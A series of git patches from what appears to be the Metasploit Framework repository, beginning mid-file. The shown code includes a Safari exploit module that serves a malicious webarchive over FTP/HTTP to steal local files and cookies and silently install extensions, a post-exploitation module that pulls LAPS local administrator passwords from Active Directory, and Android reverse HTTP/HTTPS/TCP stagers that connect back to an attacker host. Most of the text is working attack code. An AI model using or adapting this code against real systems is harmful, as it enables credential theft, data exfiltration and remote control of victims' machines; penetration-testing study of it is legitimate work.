+      send_response(cli, 200, 'OK', exploit_html)
+    end
+  end
+
+  def ftp_user
+    @ftp_user ||= Rex::Text.rand_text_alpha(6)
+  end
+
+  def ftp_pass
+    @ftp_pass ||= Rex::Text.rand_text_alpha(6)
+  end
+
+  def exploit_html
+    %Q|
+      <html><body>
+      <script>
+        window.onclick = function() {
+          window.open(window.location+'/#{popup_path}', 'x', 'width=1,height=1');
+        }
+      </script>
+      The page has moved. <a href='#'>Click here</a> to be redirected.
+      </body></html>
+    |
+  end
+
+  def ftp_url
+    "ftp://#{ftp_user}:#{ftp_pass}@#{lookup_lhost}:#{datastore['SRVPORT']}"
+  end
+
+  def popup_html
+    %Q|
+    <script>
+
+      function perform() {
+        if (arguments.length > 0) {
+          var nextArgs = Array.prototype.slice.call(arguments, 1);
+          arguments[0]();
+          setTimeout(function() {
+            perform.apply(null, nextArgs);
+          }, 300);
+        }
+      }
+
+      perform(
+        function() { opener.location = 'http://localhost:99999'; },
+        function() { history.pushState.call(opener.history, {}, {}, 'file:///'); },
+        function() { opener.location = 'about:blank' },
+        function() { opener.history.back(); },
+        function() { window.location = '#{ftp_url}'; },
+        function() { opener.location = 'http://localhost:99998'; },
+        function() {
+          history.pushState.call(
+            opener.history, {}, {},
+            'file:///Volumes/#{lookup_lhost}/#{payload_name}'
+          );
+        },
+        function() { opener.location = 'about:blank'; },
+        function() { opener.history.back(); },
+        function() { },
+        function() { window.location = '#{apple_extension_url}'; }
+      )
+
+     </script>
+    |
+  end
+
+  #
+  # Handle FTP LIST request (send back the directory listing)
+  #
+  def on_client_command_list(c, arg)
+    conn = establish_data_connection(c)
+    if not conn
+      c.put("425 Can't build data connection\r\n")
+      return
+    end
+
+    print_status("Data connection setup")
+    c.put("150 Here comes the directory listing\r\n")
+
+    print_status("Sending directory list via data connection #{webarchive_size}")
+    month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
+    m = month_names[Time.now.month-1]
+    d = Time.now.day
+    y = Time.now.year
+
+    dir = "-rwxr-xr-x 1 ftp ftp              #{webarchive_size} #{m} #{d}  #{y} #{payload_name}\r\n"
+    print_status dir
+    conn.put(dir)
+    conn.close
+
+    print_status("Directory sent ok")
+    c.put("226 Transfer ok\r\n")
+
+    return
+  end
+
+  #
+  # Handle the FTP RETR request. This is where we transfer our actual malicious payload
+  #
+  def on_client_command_retr(c, arg)
+    conn = establish_data_connection(c)
+    if not conn
+      return c.put("425 can't build data connection\r\n")
+    end
+
+    print_status("Connection for file transfer accepted")
+    c.put("150 Connection accepted\r\n")
+
+    # Send out payload
+    conn.put(webarchive)
+    conn.close
+  end
+
+  def volume_name
+    @volume_name ||= Rex::Text.rand_text_alpha(12)
+  end
+
+  def payload_name
+    'msf.webarchive'
+  end
+
+  def popup_path
+    @popup_uri ||= Rex::Text.rand_text_alpha(12)
+  end
+
+  def webarchive
+    webarchive_xml
+  end
+
+  def webarchive_size
+    print_status "Webarchive_SiZE=#{webarchive_xml.length}"
+    webarchive_xml.length
+  end
+
+  def run
+    # Start the FTP server
+    print_status("Running FTP service...")
+    start_service
+
+    # Create our own HTTP server
+    # We will stay in this functino until we manually terminate execution
+    start_http
+  end
+
+  #
+  # Handle the HTTP request and return a response.  Code borrorwed from:
+  # msf/core/exploit/http/server.rb
+  #
+  def start_http(opts={})
+    # Ensture all dependencies are present before initializing HTTP
+    use_zlib
+
+    comm = datastore['ListenerComm']
+    if (comm.to_s == "local")
+      comm = ::Rex::Socket::Comm::Local
+    else
+      comm = nil
+    end
+
+    # Default the server host / port
+    opts = {
+      'ServerHost' => datastore['SRVHOST'],
+      'ServerPort' => datastore['HTTPPORT'],
+      'Comm'       => comm
+    }.update(opts)
+
+    # Start a new HTTP server
+    @http_service = Rex::ServiceManager.start(
+      Rex::Proto::Http::Server,
+      opts['ServerPort'].to_i,
+      opts['ServerHost'],
+      datastore['SSL'],
+      {
+        'Msf'        => framework,
+        'MsfExploit' => self,
+      },
+      opts['Comm'],
+      datastore['SSLCert']
+    )
+
+    @http_service.server_name = datastore['HTTP::server_name']
+
+    # Default the procedure of the URI to on_request_uri if one isn't
+    # provided.
+    uopts = {
+      'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+      'Path' => resource_uri
+    }.update(opts['Uri'] || {})
+
+    proto = (datastore["SSL"] ? "https" : "http")
+    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
+
+    if (opts['ServerHost'] == '0.0.0.0')
+      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
+    end
+
+    # Add path to resource
+    @service_path = uopts['Path']
+    @http_service.add_resource(uopts['Path'], uopts)
+
+    # As long as we have the http_service object, we will keep the ftp server alive
+    while @http_service
+      select(nil, nil, nil, 1)
+    end
+  end
+
+  #
+  # Ensures that gzip can be used.  If not, an exception is generated.  The
+  # exception is only raised if the DisableGzip advanced option has not been
+  # set.
+  #
+  def use_zlib
+    if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
+      fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set.  Don't do that!")
+    end
+  end
+
+  #
+  # Returns the configured (or random, if not configured) URI path
+  #
+  def resource_uri
+    path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
+    path = '/' + path if path !~ /^\//
+    datastore['URIPATH'] = path
+    return path
+  end
+
+  #
+  # Create an HTTP response and then send it
+  #
+  def send_response(cli, code, message='OK', html='')
+    proto = Rex::Proto::Http::DefaultProtocol
+    res = Rex::Proto::Http::Response.new(code, message, proto)
+    res['Content-Type'] = 'text/html'
+    res.body = html
+
+    cli.send_response(res)
+  end
+
+  # @param [Hash] data the data to store in the log
+  # @return [String] filename where we are storing the data
+  def record_data(data, cli)
+    file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
+    store_loot(
+      file, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
+    )
+  end
+
+  #
+  # Kill HTTP/FTP (shut them down and clear resources)
+  #
+  def cleanup
+    super
+
+    # Kill FTP
+    stop_service
+
+    # clear my resource, deregister ref, stop/close the HTTP socket
+    begin
+      @http_service.remove_resource(datastore['URIPATH'])
+      @http_service.deref
+      @http_service.stop
+      @http_service.close
+      @http_service = nil
+    rescue
+    end
+  end
+
+end

From 76c2198ef0d30dbea3edf2f588c79f1a6c43a8f7 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 23 Jun 2015 22:56:53 +0100
Subject: [PATCH 0528/1013] LAPS enum

---
 modules/post/windows/gather/enum_ad_users.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb
index e0cba065b2..c6edd85df4 100644
--- a/modules/post/windows/gather/enum_ad_users.rb
+++ b/modules/post/windows/gather/enum_ad_users.rb
@@ -190,7 +190,8 @@ class Metasploit3 < Msf::Post
     # Assemble the options hash for creating the Metasploit::Credential::Login object
     login_data = {
       core: credential_core,
-      status: status
+      status: status,
+      access_level: 'Administrator',
     }
 
     login_data[:last_attempted_at] = DateTime.now unless (status == Metasploit::Model::Login::Status::UNTRIED)

From 221980820ae45c30b243b2514588e8f58c9405d5 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 23 Jun 2015 23:01:59 +0100
Subject: [PATCH 0529/1013] Committed wrong file This reverts commit
 76c2198ef0d30dbea3edf2f588c79f1a6c43a8f7.

---
 modules/post/windows/gather/enum_ad_users.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb
index c6edd85df4..e0cba065b2 100644
--- a/modules/post/windows/gather/enum_ad_users.rb
+++ b/modules/post/windows/gather/enum_ad_users.rb
@@ -190,8 +190,7 @@ class Metasploit3 < Msf::Post
     # Assemble the options hash for creating the Metasploit::Credential::Login object
     login_data = {
       core: credential_core,
-      status: status,
-      access_level: 'Administrator',
+      status: status
     }
 
     login_data[:last_attempted_at] = DateTime.now unless (status == Metasploit::Model::Login::Status::UNTRIED)

From 4392b7c1decdca4183dd8e16be97566a209a723c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 23 Jun 2015 23:02:22 +0100
Subject: [PATCH 0530/1013] Enum LAPS

---
 .../windows/gather/credentials/enum_laps.rb   | 192 ++++++++++++++++++
 1 file changed, 192 insertions(+)
 create mode 100644 modules/post/windows/gather/credentials/enum_laps.rb

diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb
new file mode 100644
index 0000000000..be1c9f15b0
--- /dev/null
+++ b/modules/post/windows/gather/credentials/enum_laps.rb
@@ -0,0 +1,192 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::LDAP
+
+  FIELDS = ['distinguishedName',
+            'dNSHostName',
+            'ms-MCS-AdmPwd',
+            'ms-MCS-AdmPwdExpirationTime'].freeze
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'         => 'Windows Gather Credentials Local Administrator Password Solution',
+      'Description'  => %Q{
+        This module will recover the LAPS (Local Administrator Password Solution) passwords,
+        configured in active directory. Note, only privileged users should be able to access
+        these fields. Note: The local administrator account name is not stored in active directory,
+        by default credentials will be stored in the database against 'Administrator'.
+      },
+      'License'      => MSF_LICENSE,
+      'Author'       =>
+        [
+          'Ben Campbell',
+        ],
+      'Platform'     => [ 'win' ],
+      'SessionTypes' => [ 'meterpreter' ],
+      'References'   =>
+        [
+          ['URL', 'http://test'],
+        ]
+    ))
+
+    register_options([
+      OptString.new('LOCAL_ADMIN_NAME', [true, 'The username to store the password against', 'Administrator']),
+      OptBool.new('STORE_DB', [true, 'Store file in loot.', false]),
+      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
+      OptString.new('FILTER', [true, 'Search filter.', '(objectCategory=Computer)'])
+    ], self.class)
+
+    deregister_options('FIELDS')
+  end
+
+  def run
+    search_filter = datastore['FILTER']
+    max_search = datastore['MAX_SEARCH']
+
+    begin
+      q = query(search_filter, max_search, FIELDS)
+    rescue RuntimeError => e
+      # Raised when the default naming context isn't specified as distinguished name
+      print_error(e.message)
+      return
+    end
+
+    if q.nil? || q[:results].empty?
+      print_status('No results returned.')
+    else
+      results_table = parse_results(q[:results])
+      print_line results_table.to_s
+
+      if datastore['STORE_LOOT']
+        stored_path = store_loot('laps.passwords', 'text/plain', session, results_table.to_csv)
+        print_status("Results saved to: #{stored_path}")
+      end
+    end
+  end
+
+  # Takes the results of LDAP query, parses them into a table
+  # and records and usernames as {Metasploit::Credential::Core}s in
+  # the database.
+  #
+  # @param [Array<Array<Hash>>] the LDAP query results to parse
+  # @return [Rex::Ui::Text::Table] the table containing all the result data
+  def parse_results(results)
+    laps_results = []
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+      'Header'     => 'Local Administrator Password Solution (LAPS) Results',
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => FIELDS
+    )
+
+    results.each do |result|
+      row = []
+
+      result.each do |field|
+        if field.nil?
+          row << ""
+        else
+          if field[:type] == :number
+            value = convert_windows_nt_time_format(field[:value])
+          else
+            value = field[:value]
+          end
+          row << value
+        end
+      end
+
+      hostname = result[FIELDS.index('dNSHostName')][:value].downcase
+      password = result[FIELDS.index('ms-MCS-AdmPwd')][:value]
+      dn = result[FIELDS.index('distinguishedName')][:value]
+      expiration = convert_windows_nt_time_format(result[FIELDS.index('ms-MCS-AdmPwdExpirationTime')][:value])
+
+      unless password.to_s.empty?
+        results_table << row
+        laps_results << { hostname: hostname,
+                          password: password,
+                          dn: dn,
+                          expiration: expiration
+        }
+      end
+    end
+
+    if datastore['STORE_DB']
+      print_status('Resolving IP addresses...')
+      hosts = []
+      laps_results.each do |h|
+        hosts << h[:hostname]
+      end
+
+      resolve_results = client.net.resolve.resolve_hosts(hosts)
+
+      # Match each IP to a host...
+      resolve_results.each do |r|
+        l = laps_results.find{ |laps| laps[:hostname] == r[:hostname] }
+        l[:ip] = r[:ip]
+      end
+
+      laps_results.each do |r|
+        next if r[:ip].to_s.empty?
+        next if r[:password].to_s.empty?
+        store_creds(datastore['LOCAL_ADMIN_NAME'], r[:password], r[:ip])
+      end
+    end
+
+    results_table
+  end
+
+
+  def store_creds(username, password, ip)
+    service_data = {
+      address: ip,
+      port: 445,
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      username: username,
+      private_data: password,
+      private_type: :password
+    }
+
+    credential_data.merge!(service_data)
+
+    # Create the Metasploit::Credential::Core object
+    credential_core = create_credential(credential_data)
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = {
+      core: credential_core,
+      access_level: 'Administrator',
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }
+
+    # Merge in the service data and create our Login
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+
+  # https://gist.github.com/nowhereman/189111
+  def convert_windows_nt_time_format(windows_time)
+    unix_time = windows_time.to_i/10000000-11644473600
+    ruby_time = Time.at(unix_time)
+    ruby_time.strftime("%d/%m/%Y %H:%M:%S GMT %z")
+  end
+
+end

From 9c4a96761ef58a3ad14cf5e79c155cdbe6e42b11 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 23 Jun 2015 23:10:29 +0100
Subject: [PATCH 0531/1013] Small tidyup

---
 modules/post/windows/gather/credentials/enum_laps.rb | 10 +++-------
 1 file changed, 3 insertions(+), 7 deletions(-)

diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb
index be1c9f15b0..ccbe8dc996 100644
--- a/modules/post/windows/gather/credentials/enum_laps.rb
+++ b/modules/post/windows/gather/credentials/enum_laps.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
         This module will recover the LAPS (Local Administrator Password Solution) passwords,
         configured in active directory. Note, only privileged users should be able to access
         these fields. Note: The local administrator account name is not stored in active directory,
-        by default credentials will be stored in the database against 'Administrator'.
+        so we assume that this will be 'Administrator' by default.
       },
       'License'      => MSF_LICENSE,
       'Author'       =>
@@ -33,10 +33,6 @@ class Metasploit3 < Msf::Post
         ],
       'Platform'     => [ 'win' ],
       'SessionTypes' => [ 'meterpreter' ],
-      'References'   =>
-        [
-          ['URL', 'http://test'],
-        ]
     ))
 
     register_options([
@@ -56,7 +52,6 @@ class Metasploit3 < Msf::Post
     begin
       q = query(search_filter, max_search, FIELDS)
     rescue RuntimeError => e
-      # Raised when the default naming context isn't specified as distinguished name
       print_error(e.message)
       return
     end
@@ -64,6 +59,7 @@ class Metasploit3 < Msf::Post
     if q.nil? || q[:results].empty?
       print_status('No results returned.')
     else
+      print_status('Parsing results...')
       results_table = parse_results(q[:results])
       print_line results_table.to_s
 
@@ -76,7 +72,7 @@ class Metasploit3 < Msf::Post
 
   # Takes the results of LDAP query, parses them into a table
   # and records and usernames as {Metasploit::Credential::Core}s in
-  # the database.
+  # the database if datastore option STORE_DB is true.
   #
   # @param [Array<Array<Hash>>] the LDAP query results to parse
   # @return [Rex::Ui::Text::Table] the table containing all the result data

From 1af12fd11f3898f6af4ba3f785e22abf4bd81cc0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 23 Jun 2015 19:09:14 -0500
Subject: [PATCH 0532/1013] Glassfish version 9

---
 .../framework/login_scanner/glassfish.rb      | 34 +++++++++++++++++--
 1 file changed, 32 insertions(+), 2 deletions(-)

diff --git a/lib/metasploit/framework/login_scanner/glassfish.rb b/lib/metasploit/framework/login_scanner/glassfish.rb
index 064a583d9e..b6cbf9a2ed 100644
--- a/lib/metasploit/framework/login_scanner/glassfish.rb
+++ b/lib/metasploit/framework/login_scanner/glassfish.rb
@@ -137,6 +137,33 @@ module Metasploit
         end
 
 
+        # Tries to login to Glassfish version 9
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Hash]
+        #   * :status [Metasploit::Model::Login::Status]
+        #   * :proof [String] the HTTP response body
+        def try_glassfish_9(credential)
+          res = try_login(credential)
+          if res && res.code == 302
+            opts = {
+              'uri'     => '/applications/upload.jsf',
+              'method'  => 'GET',
+              'headers' => {
+                'Cookie'  => "JSESSIONID=#{self.jsession}"
+              }
+            }
+
+            res = send_request(opts)
+            if res && res.code.to_i == 302 && res.headers['Location'].to_s !~ /loginError\.jsf$/
+              return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body}
+            end
+          end
+
+          {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.body}
+        end
+
+
         # Tries to login to Glassfish version 3 or 4 (as of now it's the latest)
         #
         # @param (see #try_glassfish_2)
@@ -176,12 +203,15 @@ module Metasploit
 
           begin
             case self.version
-            when /^[29]\.x$/
+            when /^2\.x$/
               status = try_glassfish_2(credential)
               result_opts.merge!(status)
             when /^[34]\./
               status = try_glassfish_3(credential)
               result_opts.merge!(status)
+            when /^9\.x$/
+              status = try_glassfish_9(credential)
+              result_opts.merge!(status) 
             end
           rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
             result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
@@ -191,7 +221,7 @@ module Metasploit
         end
 
         #
-        # Extract the target's glassfish version from the HTTP Server header
+        # Extract the target's glassfish version from the HTTP Server Sun Java System Application Server 9.1header
         # (ex: Sun Java System Application Server 9.x)
         #
         # @param banner [String] `Server` header from a Glassfish service response

From d59c418df63d7021e25fe4e9bef0b6103ad21d6b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 23 Jun 2015 19:10:14 -0500
Subject: [PATCH 0533/1013] Fix #5591

Fix #5591
---
 lib/metasploit/framework/login_scanner/glassfish.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/metasploit/framework/login_scanner/glassfish.rb b/lib/metasploit/framework/login_scanner/glassfish.rb
index b6cbf9a2ed..8537f8b04b 100644
--- a/lib/metasploit/framework/login_scanner/glassfish.rb
+++ b/lib/metasploit/framework/login_scanner/glassfish.rb
@@ -220,7 +220,7 @@ module Metasploit
           Result.new(result_opts)
         end
 
-        #
+
         # Extract the target's glassfish version from the HTTP Server Sun Java System Application Server 9.1header
         # (ex: Sun Java System Application Server 9.x)
         #

From e796e56c6ce6e7afabc654c05be1f6512031c9a5 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 23 Jun 2015 17:47:13 +1000
Subject: [PATCH 0534/1013] Modify the staging process

---
 lib/msf/core/payload/dalvik.rb                |  9 +++++--
 .../payloads/stagers/android/reverse_http.rb  | 27 +++++++++----------
 .../payloads/stagers/android/reverse_https.rb | 25 +++++++++--------
 .../payloads/stagers/android/reverse_tcp.rb   | 22 +++++++--------
 4 files changed, 43 insertions(+), 40 deletions(-)

diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb
index b70c6a9602..088345be71 100644
--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -32,8 +32,13 @@ module Msf::Payload::Dalvik
   end
 
   def apply_options(classes)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['SessionRetryTotal'].to_s)
-    string_sub(classes, 'SSSS                                ', "SSSS" + datastore['SessionRetryWait'].to_s)
+    timeouts = [
+      datastore['SessionExpirationTimeout'].to_s,
+      datastore['SessionCommunicationTimeout'].to_s,
+      datastore['SessionRetryTotal'].to_s,
+      datastore['SessionRetryWait'].to_s
+    ].join('-')
+    string_sub(classes, 'TTTT                                ', 'TTTT' + timeouts)
   end
 
   def string_sub(data, placeholder="", input="")
diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
index bc84647149..87b2fbf319 100644
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -17,15 +17,15 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Dalvik Reverse HTTP Stager',
-      'Description'   => 'Tunnel communication over HTTP',
-      'Author'        => 'anwarelmakrahy',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'android',
-      'Arch'          => ARCH_DALVIK,
-      'Handler'       => Msf::Handler::ReverseHttp,
-      'Stager'        => {'Payload' => ""}
-      ))
+      'Name'        => 'Dalvik Reverse HTTP Stager',
+      'Description' => 'Tunnel communication over HTTP',
+      'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseHttp,
+      'Stager'      => {'Payload' => ''}
+    ))
   end
 
   def generate_jar(opts={})
@@ -36,13 +36,12 @@ module Metasploit3
       uri_req_len = 5
     end
 
-    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
-    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    lurl << "/"
-    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    # TODO: perhaps wire in an existing UUID from opts?
+    url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
     apply_options(classes)
 
     jar = Rex::Zip::Jar.new
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
index b26e75de92..fa93d598f4 100644
--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -17,14 +17,14 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Dalvik Reverse HTTPS Stager',
-      'Description'   => 'Tunnel communication over HTTPS',
-      'Author'        => 'anwarelmakrahy',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'android',
-      'Arch'          => ARCH_DALVIK,
-      'Handler'       => Msf::Handler::ReverseHttps,
-      'Stager'        => {'Payload' => ""}
+      'Name'        => 'Dalvik Reverse HTTPS Stager',
+      'Description' => 'Tunnel communication over HTTPS',
+      'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseHttps,
+      'Stager'      => {'Payload' => ''}
     ))
   end
 
@@ -36,13 +36,12 @@ module Metasploit3
       uri_req_len = 5
     end
 
-    lurl = "ZZZZhttps://#{datastore["LHOST"]}"
-    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    lurl << "/"
-    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
+    url = "https://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    # TODO: perhaps wire in an existing UUID from opts?
+    url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])
diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
index 6aacb42a45..087d6c800a 100644
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = :dynamic
 
@@ -17,14 +17,14 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'			=> 'Dalvik Reverse TCP Stager',
-      'Description'	=> 'Connect back stager',
-      'Author'		=> 'timwr',
-      'License'		=> MSF_LICENSE,
-      'Platform'		=> 'android',
-      'Arch'			=> ARCH_DALVIK,
-      'Handler'		=> Msf::Handler::ReverseTcp,
-      'Stager'		=> {'Payload' => ""}
+      'Name'        => 'Dalvik Reverse TCP Stager',
+      'Description' => 'Connect back stager',
+      'Author'      => ['timwr', 'OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => {'Payload' => ''}
     ))
   end
 
@@ -37,8 +37,8 @@ module Metasploit3
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
 
-    string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
-    string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
+    url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
     apply_options(classes)
 
     jar.add_file("classes.dex", fix_dex_header(classes))

From 8b6fba4988f9c0c095795c077cf76ffe2984824c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Wed, 24 Jun 2015 02:08:06 -0500
Subject: [PATCH 0535/1013] Tweak and fix some things in Safari file URL
 module.

---
 lib/msf/core/format/webarchive.rb             | 45 +++++++++++--------
 .../gather/safari_file_url_navigation.rb      | 37 +++++++--------
 2 files changed, 43 insertions(+), 39 deletions(-)

diff --git a/lib/msf/core/format/webarchive.rb b/lib/msf/core/format/webarchive.rb
index df369f7438..0f2ae6aded 100644
--- a/lib/msf/core/format/webarchive.rb
+++ b/lib/msf/core/format/webarchive.rb
@@ -1,23 +1,26 @@
-#safari.installExtension("com.pinterest.extension-HWZFLG9PNK","http://assets.pinterest.com/ext/Pinterest-Safari.safariextz")
-
+#
+# The WebArchive mixin provides methods for generating a Safari .webarchive file
+# that performs a variety of malicious tasks: stealing files, cookies, and silently
+# installing extensions from extensions.apple.com.
+#
 module Msf
 module Format
 module Webarchive
 
   def initialize(info={})
     super
-    register_options(
-      [
-        OptString.new('FILENAME', [ true, 'The file name',  'msf.webarchive']),
-        OptString.new('GRABPATH', [false, "The URI to receive the UXSS'ed data", 'grab']),
-        OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive', '/msf.webarchive']),
-        OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal. $USER will be resolved to the username.', '']),
-        OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing", true]),
-        OptBool.new('STEAL_FILES', [true, "Enable local file stealing", true]),
-        OptString.new('EXTENSION_URL', [false, "HTTP URL of a Safari extension to install"]),
-        OptString.new('EXTENSION_ID', [false, "The ID of the Safari extension to install"])
-      ],
-      self.class)
+    register_options([
+      OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
+      OptString.new('FILENAME', [ true, 'The file name',  'msf.webarchive']),
+      OptString.new('GRABPATH', [false, "The URI to receive the UXSS'ed data", 'grab']),
+      OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive', '/msf.webarchive']),
+      OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal. $USER will be resolved to the username.', '']),
+      OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing", true]),
+      OptBool.new('STEAL_FILES', [true, "Enable local file stealing", true]),
+      OptBool.new('INSTALL_EXTENSION', [true, "Silently install a Safari extensions (requires click)", false]),
+      OptString.new('EXTENSION_URL', [false, "HTTP URL of a Safari extension to install", "https://data.getadblock.com/safari/AdBlock.safariextz"]),
+      OptString.new('EXTENSION_ID', [false, "The ID of the Safari extension to install", "com.betafish.adblockforsafari-UAMUU4S2D9"])
+    ], self.class)
   end
 
   ### ASSEMBLE THE WEBARCHIVE XML ###
@@ -90,8 +93,7 @@ module Webarchive
   def iframes_container_html
     hidden_style = "position:fixed; left:-600px; top:-600px;"
     wrap_with_doc do
-      frames = "<iframe src='#{apple_extension_url}' style='#{hidden_style}'></iframe>"
-      communication_js + frames + injected_js_helpers + steal_files + install_extension + message
+      communication_js + injected_js_helpers + steal_files + install_extension + message
     end
   end
 
@@ -115,18 +117,23 @@ module Webarchive
   end
 
   def install_extension
+    return '' unless datastore['INSTALL_EXTENSION']
+    raise "EXTENSION_URL datastore option missing" unless datastore['EXTENSION_URL'].present?
+    raise "EXTENSION_ID datastore option missing" unless datastore['EXTENSION_ID'].present?
     wrap_with_script do
       %Q|
       var extURL = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_URL'])}');
       var extID = atob('#{Rex::Text.encode_base64(datastore['EXTENSION_ID'])}');
 
-      setTimeout(function(){
+      window.onclick = function(){
